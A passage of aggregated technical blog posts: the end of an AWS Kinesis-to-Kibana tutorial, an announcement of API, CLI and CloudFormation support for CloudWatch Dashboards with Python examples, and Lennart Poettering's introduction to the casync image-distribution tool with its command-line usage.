  2. Choose the stream name that you created earlier, and use the default settings for everything else. Then choose Save and Continue.
  3. On the application configuration page, choose Exit to Kinesis Analytics applications to return to the Amazon Kinesis Analytics console.
  4. Run the Python script again for 4–5 minutes to generate enough data to flow through Amazon Kinesis Streams, Kinesis Analytics, Kinesis Firehose, and finally into the Amazon ES domain.
  5. Open the Kinesis Firehose console, choose the stream, and then choose the Monitoring
  6. As the processed data flows into Kinesis Firehose and Amazon ES, the metrics appear on the Delivery Stream metrics page. Keep in mind that the metrics page takes a few minutes to refresh with the latest data.
  7. Open the Amazon Elasticsearch Service dashboard in the AWS Management Console. The count in the Searchable documents column increases as shown in the following screenshot. In addition, the domain shows a cluster health of Yellow. This is because, by default, it needs two instances to deploy redundant copies of the index. To fix this, you can deploy two instances instead of one.

Visualize the data using Kibana

Now it’s time to launch Kibana and visualize the data.

  1. Use the ES domain link to go to the cluster detail page, and then choose the Kibana link as shown in the following screenshot.

    If you’re working behind a proxy or firewall, see the “Use a proxy to simplify request signing” section in this blog post to learn how to work with a proxy.
  2. In the Kibana dashboard, choose the Discover tab to perform a query.
  3. You can also visualize the data using the different types of charts offered by Kibana. For example, by going to the Visualize tab, you can quickly create a split bar chart that aggregates by ANOMALY_SCORE per minute.


Conclusion

In this post, you learned how to use Amazon Kinesis to collect, process, and analyze real-time streaming data, and then export the results to Amazon ES for analysis and visualization with Kibana. If you have comments about this post, add them to the “Comments” section below. If you have questions or issues with implementing this solution, please open a new thread on the Amazon Kinesis or Amazon ES discussion forums.


Next Steps

Take your skills to the next level. Learn real-time clickstream anomaly detection with Amazon Kinesis Analytics.

 


About the Author

Tristan Li is a Solutions Architect with Amazon Web Services. He works with enterprise customers in the US, helping them adopt cloud technology to build scalable and secure solutions on AWS.

 

 

 

 

New – API & CloudFormation Support for Amazon CloudWatch Dashboards

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-api-cloudformation-support-for-amazon-cloudwatch-dashboards/

We launched CloudWatch Dashboards a couple of years ago. In the post that I wrote for the launch, I showed you how to interactively create a dashboard that displayed chosen CloudWatch metrics in graphical form. After the launch, we added additional features including a full screen mode, a dark theme, control over the range of the Y axis, simplified renaming, persistent storage, and new visualization options.

New API & CLI
While console support is wonderful for interactive use, many customers have asked us to support programmatic creation and manipulation of dashboards and the widgets within. They would like to dynamically build and maintain dashboards, adding and removing widgets as the corresponding AWS resources are created and destroyed. Other customers are interested in setting up and maintaining a consistent set of dashboards across two or more AWS accounts.

I am happy to announce that API, CLI, and AWS CloudFormation support for CloudWatch Dashboards is available now and that you can start using it today!

There are four new API functions (and equivalent CLI commands):

ListDashboards / aws cloudwatch list-dashboards – Fetch a list of all dashboards within an account, or a subset that share a common prefix.

GetDashboard / aws cloudwatch get-dashboard – Fetch details for a single dashboard.

PutDashboard / aws cloudwatch put-dashboard – Create a new dashboard or update an existing one.

DeleteDashboards / aws cloudwatch delete-dashboards – Delete one or more dashboards.

Dashboard Concepts
I want to show you how to use these functions and commands. Before I dive in, I should review a couple of important dashboard concepts and attributes.

Global – Dashboards are part of an AWS account, and are not associated with a specific AWS Region. Each account can have up to 500 dashboards.

Named – Each dashboard has a name that is unique within the AWS account. Names can be up to 255 characters long.

Grid Model – Each dashboard is composed of a grid of cells. The grid is 24 cells across and as tall as necessary. Each widget on the dashboard is positioned at a particular set of grid coordinates, and has a size that spans an integral number of grid cells.

Widgets (Visualizations) – Each widget can display text or a set of CloudWatch metrics. Text is specified using Markdown; metrics can be displayed as single values, line charts, or stacked area charts. Each dashboard can have up to 100 widgets. Widgets that display metrics can also be associated with a CloudWatch Alarm.

Dashboards have a JSON representation that you can now see and edit from within the console. Simply click on the Action menu and choose View/edit source:

Here’s the source for my dashboard:

You can use this JSON as a starting point for your own applications. As you can see, there’s an entry in the widgets array for each widget on the dashboard; each entry describes one widget, starting with its type, position, and size.

Creating a Dashboard Using the API
Let’s say I want to create a dashboard that has a widget for each of my EC2 instances in a particular region. I’ll use Python and the AWS SDK for Python, and start as follows (excuse the amateur nature of my code):

import boto3
import json

cw  = boto3.client("cloudwatch")
ec2 = boto3.client("ec2")

x, y          = [0, 0]
width, height = [3, 3]
max_width     = 12
widgets       = []

Then I simply iterate over the instances, creating a widget dictionary for each one, and appending it to the widgets array:

instances = ec2.describe_instances()
for r in instances['Reservations']:
    for i in r['Instances']:

        widget = {'type'      : 'metric',
                  'x'         : x,
                  'y'         : y,
                  'height'    : height,
                  'width'     : width,
                  'properties': {'view'    : 'timeSeries',
                                 'stacked' : False,
                                 'metrics' : [['AWS/EC2', 'NetworkIn', 'InstanceId', i['InstanceId']],
                                              ['.',       'NetworkOut', '.',         '.']
                                             ],
                                 'period'  : 300,
                                 'stat'    : 'Average',
                                 'region'  : 'us-east-1',
                                 'title'   : i['InstanceId']
                                }
                 }

        widgets.append(widget)

I update the position (x and y) within the loop, and form a grid (if I don’t specify positions, the widgets will be laid out left to right, top to bottom):

        x += width
        if (x + width > max_width):
            x = 0
            y += height

After I have processed all of the instances, I create a JSON version of the widget array:

body   = {'widgets' : widgets}
body_j = json.dumps(body)

And I create or update my dashboard:

cw.put_dashboard(DashboardName = "EC2_Networking",
                 DashboardBody = body_j)

I run the code, and get the following dashboard:

The CloudWatch team recommends that dashboards created programmatically include a text widget indicating that the dashboard was generated automatically, along with a link to the source code or CloudFormation template that did the work. This will discourage users from making manual, out-of-band changers to the dashboards.

As I mentioned earlier, each metric widget can also be associated with a CloudWatch Alarm. You can create the alarms programmatically or by using a CloudFormation template such as the Sample CPU Utilization Alarm. If you decide to do this, the alarm threshold will be displayed in the widget. To learn more about this, read Tara Walker’s recent post, Amazon CloudWatch Launches Alarms on Dashboards.

Going one step further, I could use CloudWatch Events and a Lamba Function to track the creation and deletion of certain resources and update a dashboard in concert with the changes. To learn how to do this, read Keeping CloudWatch Dashboards up to Date Using AWS Lambda.

Accessing a Dashboard Using the CLI
I can also access and manipulate my dashboards from the command line. For example, I can generate a simple list:

$ aws cloudwatch list-dashboards --output table
----------------------------------------------
|               ListDashboards               |
+--------------------------------------------+
||             DashboardEntries             ||
|+-----------------+----------------+-------+|
||  DashboardName  | LastModified   | Size  ||
|+-----------------+----------------+-------+|
||  Disk-Metrics   |  1496405221.0  |  316  ||
||  EC2_Networking |  1498090434.0  |  2830 ||
||  Main-Metrics   |  1498085173.0  |  234  ||
|+-----------------+----------------+-------+|

And I can get rid of the Disk-Metrics dashboard:

$ aws cloudwatch delete-dashboards --dashboard-names Disk-Metrics

I can also retrieve the JSON that defines a dashboard:

Creating a Dashboard Using CloudFormation
Dashboards can also be specified in CloudFormation templates. Here’s a simple template in YAML (the DashboardBody is still specified in JSON):

Resources:
  MyDashboard:
    Type: "AWS::CloudWatch::Dashboard"
    Properties:
      DashboardName: SampleDashboard
      DashboardBody: '{"widgets":[{"type":"text","x":0,"y":0,"width":6,"height":6,"properties":{"markdown":"Hi there from CloudFormation"}}]}'

I place the template in a file and then create a stack using the console or the CLI:

$ aws cloudformation create-stack --stack-name MyDashboard --template-body file://dash.yaml
{
    "StackId": "arn:aws:cloudformation:us-east-1:xxxxxxxxxxxx:stack/MyDashboard/a2a3fb20-5708-11e7-8ffd-500c21311262"
}

Here’s the dashboard:

Available Now
This feature is available now and you can start using it today. You can create 3 dashboards with up to 50 metrics per dashboard at no charge; additional dashboards are priced at $3 per month, as listed on the CloudWatch Pricing page. You can make up to 1 million calls to the new API functions each month at no charge; beyond that you pay $.01 for every 1,000 calls.

Jeff;

casync — A tool for distributing file system images

Post Syndicated from Lennart Poettering original http://0pointer.net/blog/casync-a-tool-for-distributing-file-system-images.html

Introducing casync

In the past months I have been working on a new project:
casync. casync takes
inspiration from the popular rsync file
synchronization tool as well as the probably even more popular
git revision control system. It combines the
idea of the rsync algorithm with the idea of git-style
content-addressable file systems, and creates a new system for
efficiently storing and delivering file system images, optimized for
high-frequency update cycles over the Internet. Its current focus is
on delivering IoT, container, VM, application, portable service or OS
images, but I hope to extend it later in a generic fashion to become
useful for backups and home directory synchronization as well (but
more about that later).

The basic technological building blocks casync is built from are
neither new nor particularly innovative (at least not anymore),
however the way casync combines them is different from existing tools,
and that’s what makes it useful for a variety of use-cases that other
tools can’t cover that well.

Why?

I created casync after studying how today’s popular tools store and
deliver file system images. To briefly name a few: Docker has a
layered tarball approach,
OSTree serves the
individual files directly via HTTP and maintains packed deltas to
speed up updates, while other systems operate on the block layer and
place raw squashfs images (or other archival file systems, such as
IS09660) for download on HTTP shares (in the better cases combined
with zsync data).

Neither of these approaches appeared fully convincing to me when used
in high-frequency update cycle systems. In such systems, it is
important to optimize towards a couple of goals:

  1. Most importantly, make updates cheap traffic-wise (for this most tools use image deltas of some form)
  2. Put boundaries on disk space usage on servers (keeping deltas between all version combinations clients might want to run updates between, would suggest keeping an exponentially growing amount of deltas on servers)
  3. Put boundaries on disk space usage on clients
  4. Be friendly to Content Delivery Networks (CDNs), i.e. serve neither too many small nor too many overly large files, and only require the most basic form of HTTP. Provide the repository administrator with high-level knobs to tune the average file size delivered.
  5. Simplicity to use for users, repository administrators and developers

I don’t think any of the tools mentioned above are really good on more
than a small subset of these points.

Specifically: Docker’s layered tarball approach dumps the “delta”
question onto the feet of the image creators: the best way to make
your image downloads minimal is basing your work on an existing image
clients might already have, and inherit its resources, maintaining full
history. Here, revision control (a tool for the developer) is
intermingled with update management (a concept for optimizing
production delivery). As container histories grow individual deltas
are likely to stay small, but on the other hand a brand-new deployment
usually requires downloading the full history onto the deployment
system, even though there’s no use for it there, and likely requires
substantially more disk space and download sizes.

OSTree’s serving of individual files is unfriendly to CDNs (as many
small files in file trees cause an explosion of HTTP GET
requests). To counter that OSTree supports placing pre-calculated
delta images between selected revisions on the delivery servers, which
means a certain amount of revision management, that leaks into the
clients.

Delivering direct squashfs (or other file system) images is almost
beautifully simple, but of course means every update requires a full
download of the newest image, which is both bad for disk usage and
generated traffic. Enhancing it with zsync makes this a much better
option, as it can reduce generated traffic substantially at very
little cost of history/meta-data (no explicit deltas between a large
number of versions need to be prepared server side). On the other hand
server requirements in disk space and functionality (HTTP Range
requests) are minus points for the use-case I am interested in.

(Note: all the mentioned systems have great properties, and it’s not
my intention to badmouth them. They only point I am trying to make is
that for the use case I care about — file system image delivery with
high high frequency update-cycles — each system comes with certain
drawbacks.)

Security & Reproducibility

Besides the issues pointed out above I wasn’t happy with the security
and reproducibility properties of these systems. In today’s world
where security breaches involving hacking and breaking into connected
systems happen every day, an image delivery system that cannot make
strong guarantees regarding data integrity is out of
date. Specifically, the tarball format is famously nondeterministic:
the very same file tree can result in any number of different
valid serializations depending on the tool used, its version and the
underlying OS and file system. Some tar implementations attempt to
correct that by guaranteeing that each file tree maps to exactly
one valid serialization, but such a property is always only specific
to the tool used. I strongly believe that any good update system must
guarantee on every single link of the chain that there’s only one
valid representation of the data to deliver, that can easily be
verified.

What casync Is

So much about the background why I created casync. Now, let’s have a
look what casync actually is like, and what it does. Here’s the brief
technical overview:

Encoding: Let’s take a large linear data stream, split it into
variable-sized chunks (the size of each being a function of the
chunk’s contents), and store these chunks in individual, compressed
files in some directory, each file named after a strong hash value of
its contents, so that the hash value may be used to as key for
retrieving the full chunk data. Let’s call this directory a “chunk
store”. At the same time, generate a “chunk index” file that lists
these chunk hash values plus their respective chunk sizes in a simple
linear array. The chunking algorithm is supposed to create variable,
but similarly sized chunks from the data stream, and do so in a way
that the same data results in the same chunks even if placed at
varying offsets. For more information see this blog
story
.

Decoding: Let’s take the chunk index file, and reassemble the large
linear data stream by concatenating the uncompressed chunks retrieved
from the chunk store, keyed by the listed chunk hash values.

As an extra twist, we introduce a well-defined, reproducible,
random-access serialization format for file trees (think: a more
modern tar), to permit efficient, stable storage of complete file
trees in the system, simply by serializing them and then passing them
into the encoding step explained above.

Finally, let’s put all this on the network: for each image you want to
deliver, generate a chunk index file and place it on an HTTP
server. Do the same with the chunk store, and share it between the
various index files you intend to deliver.

Why bother with all of this? Streams with similar contents will result
in mostly the same chunk files in the chunk store. This means it is
very efficient to store many related versions of a data stream in the
same chunk store, thus minimizing disk usage. Moreover, when
transferring linear data streams chunks already known on the receiving
side can be made use of, thus minimizing network traffic.

Why is this different from rsync or OSTree, or similar tools? Well,
one major difference between casync and those tools is that we
remove file boundaries before chunking things up. This means that
small files are lumped together with their siblings and large files
are chopped into pieces, which permits us to recognize similarities in
files and directories beyond file boundaries, and makes sure our chunk
sizes are pretty evenly distributed, without the file boundaries
affecting them.

The “chunking” algorithm is based on a the buzhash rolling hash
function. SHA256 is used as strong hash function to generate digests
of the chunks. xz is used to compress the individual chunks.

Here’s a diagram, hopefully explaining a bit how the encoding process
works, wasn’t it for my crappy drawing skills:

Diagram

The diagram shows the encoding process from top to bottom. It starts
with a block device or a file tree, which is then serialized and
chunked up into variable sized blocks. The compressed chunks are then
placed in the chunk store, while a chunk index file is written listing
the chunk hashes in order. (The original SVG of this graphic may be
found here.)

Details

Note that casync operates on two different layers, depending on the
use-case of the user:

  1. You may use it on the block layer. In this case the raw block data
    on disk is taken as-is, read directly from the block device, split
    into chunks as described above, compressed, stored and delivered.

  2. You may use it on the file system layer. In this case, the
    file tree serialization format mentioned above comes into play:
    the file tree is serialized depth-first (much like tar would do
    it) and then split into chunks, compressed, stored and delivered.

The fact that it may be used on both the block and file system layer
opens it up for a variety of different use-cases. In the VM and IoT
ecosystems shipping images as block-level serializations is more
common, while in the container and application world file-system-level
serializations are more typically used.

Chunk index files referring to block-layer serializations carry the
.caibx suffix, while chunk index files referring to file system
serializations carry the .caidx suffix. Note that you may also use
casync as direct tar replacement, i.e. without the chunking, just
generating the plain linear file tree serialization. Such files
carry the .catar suffix. Internally .caibx are identical to
.caidx files, the only difference is semantical: .caidx files
describe a .catar file, while .caibx files may describe any other
blob. Finally, chunk stores are directories carrying the .castr
suffix.

Features

Here are a couple of other features casync has:

  1. When downloading a new image you may use casync‘s --seed=
    feature: each block device, file, or directory specified is processed
    using the same chunking logic described above, and is used as
    preferred source when putting together the downloaded image locally,
    avoiding network transfer of it. This of course is useful whenever
    updating an image: simply specify one or more old versions as seed and
    only download the chunks that truly changed since then. Note that
    using seeds requires no history relationship between seed and the new
    image to download. This has major benefits: you can even use it to
    speed up downloads of relatively foreign and unrelated data. For
    example, when downloading a container image built using Ubuntu you can
    use your Fedora host OS tree in /usr as seed, and casync will
    automatically use whatever it can from that tree, for example timezone
    and locale data that tends to be identical between
    distributions. Example: casync extract
    http://example.com/myimage.caibx --seed=/dev/sda1 /dev/sda2
    . This
    will place the block-layer image described by the indicated URL in the
    /dev/sda2 partition, using the existing /dev/sda1 data as seeding
    source. An invocation like this could be typically used by IoT systems
    with an A/B partition setup. Example 2: casync extract
    http://example.com/mycontainer-v3.caidx --seed=/srv/container-v1
    --seed=/srv/container-v2 /src/container-v3
    , is very similar but
    operates on the file system layer, and uses two old container versions
    to seed the new version.

  2. When operating on the file system level, the user has fine-grained
    control on the meta-data included in the serialization. This is
    relevant since different use-cases tend to require a different set of
    saved/restored meta-data. For example, when shipping OS images, file
    access bits/ACLs and ownership matter, while file modification times
    hurt. When doing personal backups OTOH file ownership matters little
    but file modification times are important. Moreover different backing
    file systems support different feature sets, and storing more
    information than necessary might make it impossible to validate a tree
    against an image if the meta-data cannot be replayed in full. Due to
    this, casync provides a set of --with= and --without= parameters
    that allow fine-grained control of the data stored in the file tree
    serialization, including the granularity of modification times and
    more. The precise set of selected meta-data features is also always
    part of the serialization, so that seeding can work correctly and
    automatically.

  3. casync tries to be as accurate as possible when storing file
    system meta-data. This means that besides the usual baseline of file
    meta-data (file ownership and access bits), and more advanced features
    (extended attributes, ACLs, file capabilities) a number of more exotic
    data is stored as well, including Linux
    chattr(1) file attributes, as
    well as FAT file
    attributes

    (you may wonder why the latter? — EFI is FAT, and /efi is part of
    the comprehensive serialization of any host). In the future I intend
    to extend this further, for example storing btrfs sub-volume
    information where available. Note that as described above every single
    type of meta-data may be turned off and on individually, hence if you
    don’t need FAT file bits (and I figure it’s pretty likely you don’t),
    then they won’t be stored.

  4. The user creating .caidx or .caibx files may control the desired
    average chunk length (before compression) freely, using the
    --chunk-size= parameter. Smaller chunks increase the number of
    generated files in the chunk store and increase HTTP GET load on the
    server, but also ensure that sharing between similar images is
    improved, as identical patterns in the images stored are more likely
    to be recognized. By default casync will use a 64K average chunk
    size. Tweaking this can be particularly useful when adapting the
    system to specific CDNs, or when delivering compressed disk images
    such as squashfs (see below).

  5. Emphasis is placed on making all invocations reproducible,
    well-defined and strictly deterministic. As mentioned above this is a
    requirement to reach the intended security guarantees, but is also
    useful for many other use-cases. For example, the casync digest
    command may be used to calculate a hash value identifying a specific
    directory in all desired detail (use --with= and --without to pick
    the desired detail). Moreover the casync mtree command may be used
    to generate a BSD mtree(5) compatible manifest of a directory tree,
    .caidx or .catar file.

  6. The file system serialization format is nicely composable. By this
    I mean that the serialization of a file tree is the concatenation of
    the serializations of all files and file sub-trees located at the
    top of the tree, with zero meta-data references from any of these
    serializations into the others. This property is essential to ensure
    maximum reuse of chunks when similar trees are serialized.

  7. When extracting file trees or disk image files, casync
    will automatically create
    reflinks
    from any specified seeds if the underlying file system supports it
    (such as btrfs, ocfs, and future xfs). After all, instead of
    copying the desired data from the seed, we can just tell the file
    system to link up the relevant blocks. This works both when extracting
    .caidx and .caibx files — the latter of course only when the
    extracted disk image is placed in a regular raw image file on disk,
    rather than directly on a plain block device, as plain block devices
    do not know the concept of reflinks.

  8. Optionally, when extracting file trees, casync can
    create traditional UNIX hard-links for identical files in specified
    seeds (--hardlink=yes). This works on all UNIX file systems, and can
    save substantial amounts of disk space. However, this only works for
    very specific use-cases where disk images are considered read-only
    after extraction, as any changes made to one tree will propagate to
    all other trees sharing the same hard-linked files, as that’s the
    nature of hard-links. In this mode, casync exposes OSTree-like
    behavior, which is built heavily around read-only hard-link trees.

  9. casync tries to be smart when choosing what to include in file
    system images. Implicitly, file systems such as procfs and sysfs are
    excluded from serialization, as they expose API objects, not real
    files. Moreover, the “nodump” (+d)
    chattr(1) flag is honored by
    default, permitting users to mark files to exclude from serialization.

  10. When creating and extracting file trees casync may apply an
    automatic or explicit UID/GID shift. This is particularly useful when
    transferring container image for use with Linux user name-spacing.

  11. In addition to local operation, casync currently supports HTTP,
    HTTPS, FTP and ssh natively for downloading chunk index files and
    chunks (the ssh mode requires installing casync on the remote host,
    though, but an sftp mode not requiring that should be easy to
    add). When creating index files or chunks, only ssh is supported as
    remote back-end.

  12. When operating on block-layer images, you may expose locally or
    remotely stored images as local block devices. Example: casync mkdev
    http://example.com/myimage.caibx
    exposes the disk image described by
    the indicated URL as local block device in /dev, which you then may
    use the usual block device tools on, such as mount or fdisk (only
    read-only though). Chunks are downloaded on access with high priority,
    and at low priority when idle in the background. Note that in this
    mode, casync also plays a role similar to “dm-verity”, as all blocks
    are validated against the strong digests in the chunk index file
    before passing them on to the kernel’s block layer. This feature is
    implemented though Linux’ NBD kernel facility.

  13. Similar, when operating on file-system-layer images, you may mount
    locally or remotely stored images as regular file systems. Example:
    casync mount http://example.com/mytree.caidx /srv/mytree mounts the
    file tree image described by the indicated URL as a local directory
    /srv/mytree. This feature is implemented though Linux’ FUSE kernel
    facility. Note that special care is taken that the images exposed this
    way can be packed up again with casync make and are guaranteed to
    return the bit-by-bit exact same serialization again that it was
    mounted from. No data is lost or changed while passing things through
    FUSE (OK, strictly speaking this is a lie, we do lose ACLs, but that’s
    hopefully just a temporary gap to be fixed soon).

  14. In IoT A/B fixed size partition setups the file systems placed in
    the two partitions are usually much shorter than the partition size,
    in order to keep some room for later, larger updates. casync is able
    to analyze the super-block of a number of common file systems in order
    to determine the actual size of a file system stored on a block
    device, so that writing a file system to such a partition and reading
    it back again will result in reproducible data. Moreover this speeds
    up the seeding process, as there’s little point in seeding the
    white-space after the file system within the partition.

Example Command Lines

Here’s how to use casync, explained with a few examples:

$ casync make foobar.caidx /some/directory

This will create a chunk index file foobar.caidx in the local
directory, and populate the chunk store directory default.castr
located next to it with the chunks of the serialization (you can
change the name for the store directory with --store= if you
like). This command operates on the file-system level. A similar
command operating on the block level:

$ casync make foobar.caibx /dev/sda1

This command creates a chunk index file foobar.caibx in the local
directory describing the current contents of the /dev/sda1 block
device, and populates default.castr in the same way as above. Note
that you may as well read a raw disk image from a file instead of a
block device:

$ casync make foobar.caibx myimage.raw

To reconstruct the original file tree from the .caidx file and
the chunk store of the first command, use:

$ casync extract foobar.caidx /some/other/directory

And similar for the block-layer version:

$ casync extract foobar.caibx /dev/sdb1

or, to extract the block-layer version into a raw disk image:

$ casync extract foobar.caibx myotherimage.raw

The above are the most basic commands, operating on local data
only. Now let’s make this more interesting, and reference remote
resources:

$ casync extract http://example.com/images/foobar.caidx /some/other/directory

This extracts the specified .caidx onto a local directory. This of
course assumes that foobar.caidx was uploaded to the HTTP server in
the first place, along with the chunk store. You can use any command
you like to accomplish that, for example scp or
rsync. Alternatively, you can let casync do this directly when
generating the chunk index:

$ casync make ssh.example.com:images/foobar.caidx /some/directory

This will use ssh to connect to the ssh.example.com server, and then
places the .caidx file and the chunks on it. Note that this mode of
operation is “smart”: this scheme will only upload chunks currently
missing on the server side, and not re-transmit what already is
available.

Note that you can always configure the precise path or URL of the
chunk store via the --store= option. If you do not do that, then the
store path is automatically derived from the path or URL: the last
component of the path or URL is replaced by default.castr.

Of course, when extracting .caidx or .caibx files from remote sources,
using a local seed is advisable:

$ casync extract http://example.com/images/foobar.caidx --seed=/some/exising/directory /some/other/directory

Or on the block layer:

$ casync extract http://example.com/images/foobar.caibx --seed=/dev/sda1 /dev/sdb2

When creating chunk indexes on the file system layer casync will by
default store meta-data as accurately as possible. Let’s create a chunk
index with reduced meta-data:

$ casync make foobar.caidx --with=sec-time --with=symlinks --with=read-only /some/dir

This command will create a chunk index for a file tree serialization
that has three features above the absolute baseline supported: 1s
granularity time-stamps, symbolic links and a single read-only bit. In
this mode, all the other meta-data bits are not stored, including
nanosecond time-stamps, full UNIX permission bits, file ownership or
even ACLs or extended attributes.

Now let’s make a .caidx file available locally as a mounted file
system, without extracting it:

$ casync mount http://example.comf/images/foobar.caidx /mnt/foobar

And similar, let’s make a .caibx file available locally as a block device:

$ casync mkdev http://example.comf/images/foobar.caibx

This will create a block device in /dev and print the used device
node path to STDOUT.

As mentioned, casync is big about reproducibility. Let’s make use of
that to calculate the a digest identifying a very specific version of
a file tree:

$ casync digest .

This digest will include all meta-data bits casync and the underlying
file system know about. Usually, to make this useful you want to
configure exactly what meta-data to include:

$ casync digest --with=unix .

This makes use of the --with=unix shortcut for selecting meta-data
fields. Specifying --with-unix= selects all meta-data that
traditional UNIX file systems support. It is a shortcut for writing out:
--with=16bit-uids --with=permissions --with=sec-time --with=symlinks
--with=device-nodes --with=fifos --with=sockets
.

Note that when calculating digests or creating chunk indexes you may
also use the negative --without= option to remove specific features
but start from the most precise:

$ casync digest --without=flag-immutable

This generates a digest with the most accurate meta-data, but leaves
one feature out: chattr(1)‘s
immutable (+i) file flag.

To list the contents of a .caidx file use a command like the following:

$ casync list http://example.com/images/foobar.caidx

or

$ casync mtree http://example.com/images/foobar.caidx

The former command will generate a brief list of files and
directories, not too different from tar t or ls -al in its
output. The latter command will generate a BSD
mtree(5) compatible
manifest. Note that casync actually stores substantially more file
meta-data than mtree files can express, though.

What casync isn’t

  1. casync is not an attempt to minimize serialization and downloaded
    deltas to the extreme. Instead, the tool is supposed to find a good
    middle ground, that is good on traffic and disk space, but not at the
    price of convenience or requiring explicit revision control. If you
    care about updates that are absolutely minimal, there are binary delta
    systems around that might be an option for you, such as Google’s
    Courgette
    .

  2. casync is not a replacement for rsync, or git or zsync or
    anything like that. They have very different use-cases and
    semantics. For example, rsync permits you to directly synchronize two
    file trees remotely. casync just cannot do that, and it is unlikely
    it every will.

Where next?

casync is supposed to be a generic synchronization tool. Its primary
focus for now is delivery of OS images, but I’d like to make it useful
for a couple other use-cases, too. Specifically:

  1. To make the tool useful for backups, encryption is missing. I have
    pretty concrete plans how to add that. When implemented, the tool
    might become an alternative to restic,
    BorgBackup or
    tarsnap.

  2. Right now, if you want to deploy casync in real-life, you still
    need to validate the downloaded .caidx or .caibx file yourself, for
    example with some gpg signature. It is my intention to integrate with
    gpg in a minimal way so that signing and verifying chunk index files
    is done automatically.

  3. In the longer run, I’d like to build an automatic synchronizer for
    $HOME between systems from this. Each $HOME instance would be
    stored automatically in regular intervals in the cloud using casync,
    and conflicts would be resolved locally.

  4. casync is written in a shared library style, but it is not yet
    built as one. Specifically this means that almost all of casync‘s
    functionality is supposed to be available as C API soon, and
    applications can process casync files on every level. It is my
    intention to make this library useful enough so that it will be easy
    to write a module for GNOME’s gvfs subsystem in order to make remote
    or local .caidx files directly available to applications (as an
    alternative to casync mount). In fact the idea is to make this all
    flexible enough that even the remoting back-ends can be replaced
    easily, for example to replace casync‘s default HTTP/HTTPS back-ends
    built on CURL with GNOME’s own HTTP implementation, in order to share
    cookies, certificates, … There’s also an alternative method to
    integrate with casync in place already: simply invoke casync as a
    sub-process. casync will inform you about a certain set of state
    changes using a mechanism compatible with
    sd_notify(3). In
    future it will also propagate progress data this way and more.

  5. I intend to a add a new seeding back-end that sources chunks from
    the local network. After downloading the new .caidx file off the
    Internet casync would then search for the listed chunks on the local
    network first before retrieving them from the Internet. This should
    speed things up on all installations that have multiple similar
    systems deployed in the same network.

Further plans are listed tersely in the
TODO file.

FAQ:

  1. Is this a systemd project?casync is hosted under the
    github systemd umbrella, and the
    projects share the same coding style. However, the code-bases are
    distinct and without interdependencies, and casync works fine both
    on systemd systems and systems without it.

  2. Is casync portable? — At the moment: no. I only run Linux and
    that’s what I code for. That said, I am open to accepting portability
    patches (unlike for systemd, which doesn’t really make sense on
    non-Linux systems), as long as they don’t interfere too much with the
    way casync works. Specifically this means that I am not too
    enthusiastic about merging portability patches for OSes lacking the
    openat(2) family
    of APIs.

  3. Does casync require reflink-capable file systems to work, such
    as btrfs?
    — No it doesn’t. The reflink magic in casync is
    employed when the file system permits it, and it’s good to have it,
    but it’s not a requirement, and casync will implicitly fall back to
    copying when it isn’t available. Note that casync supports a number
    of file system features on a variety of file systems that aren’t
    available everywhere, for example FAT’s system/hidden file flags or
    xfs‘s projinherit file flag.

  4. Is casync stable? — I just tagged the first, initial
    release. While I have been working on it since quite some time and it
    is quite featureful, this is the first time I advertise it publicly,
    and it hence received very little testing outside of its own test
    suite. I am also not fully ready to commit to the stability of the
    current serialization or chunk index format. I don’t see any breakages
    coming for it though. casync is pretty light on documentation right
    now, and does not even have a man page. I also intend to correct that
    soon.

  5. Are the .caidx/.caibx and .catar file formats open and
    documented?
    casync is Open Source, so if you want to know the
    precise format, have a look at the sources for now. It’s definitely my
    intention to add comprehensive docs for both formats however. Don’t
    forget this is just the initial version right now.

  6. casync is just like $SOMEOTHERTOOL! Why are you reinventing
    the wheel (again)?
    — Well, because casync isn’t “just like” some
    other tool. I am pretty sure I did my homework, and that there is no
    tool just like casync right now. The tools coming closest are probably
    rsync, zsync, tarsnap, restic, but they are quite different beasts
    each.

  7. Why did you invent your own serialization format for file trees?
    Why don’t you just use tar?
    — That’s a good question, and other
    systems — most prominently tarsnap — do that. However, as mentioned
    above tar doesn’t enforce reproducibility. It also doesn’t really do
    random access: if you want to access some specific file you need to
    read every single byte stored before it in the tar archive to find
    it, which is of course very expensive. The serialization casync
    implements places a focus on reproducibility, random access, and
    meta-data control. Much like traditional tar it can still be
    generated and extracted in a stream fashion though.

  8. Does casync save/restore SELinux/SMACK file labels? — At the
    moment not. That’s not because I wouldn’t want it to, but simply
    because I am not a guru of either of these systems, and didn’t want to
    implement something I do not fully grok nor can test. If you look at
    the sources you’ll find that there’s already some definitions in place
    that keep room for them though. I’d be delighted to accept a patch
    implementing this fully.

  9. What about delivering squashfs images? How well does chunking
    work on compressed serializations?
    – That’s a very good point!
    Usually, if you apply the a chunking algorithm to a compressed data
    stream (let’s say a tar.gz file), then changing a single bit at the
    front will propagate into the entire remainder of the file, so that
    minimal changes will explode into major changes. Thankfully this
    doesn’t apply that strictly to squashfs images, as it provides
    random access to files and directories and thus breaks up the
    compression streams in regular intervals to make seeking easy. This
    fact is beneficial for systems employing chunking, such as casync as
    this means single bit changes might affect their vicinity but will not
    explode in an unbounded fashion. In order achieve best results when
    delivering squashfs images through casync the block sizes of
    squashfs and the chunks sizes of casync should be matched up
    (using casync‘s --chunk-size= option). How precisely to choose
    both values is left a research subject for the user, for now.

  10. What does the name casync mean? – It’s a synchronizing
    tool, hence the -sync suffix, following rsync‘s naming. It makes
    use of the content-addressable concept of git hence the ca-
    prefix.

  11. Where can I get this stuff? Is it already packaged? – Check
    out the sources on GitHub. I
    just tagged the first
    version
    . Martin
    Pitt has packaged casync for
    Ubuntu
    . There
    is also an ArchLinux
    package
    . Zbigniew
    Jędrzejewski-Szmek has prepared a Fedora
    RPM
    that hopefully
    will soon be included in the distribution.

Should you care? Is this a tool for you?

Well, that’s up to you really. If you are involved with projects that
need to deliver IoT, VM, container, application or OS images, then
maybe this is a great tool for you — but other options exist, some of
which are linked above.

Note that casync is an Open Source project: if it doesn’t do exactly
what you need, prepare a patch that adds what you need, and we’ll
consider it.

If you are interested in the project and would like to talk about this
in person, I’ll be presenting casync soon at Kinvolk’s Linux
Technologies
Meetup

in Berlin, Germany. You are invited. I also intend to talk about it at
All Systems Go!, also in Berlin.

Building High-Throughput Genomics Batch Workflows on AWS: Workflow Layer (Part 4 of 4)

Post Syndicated from Andy Katz original https://aws.amazon.com/blogs/compute/building-high-throughput-genomics-batch-workflows-on-aws-workflow-layer-part-4-of-4/

Aaron Friedman is a Healthcare and Life Sciences Partner Solutions Architect at AWS

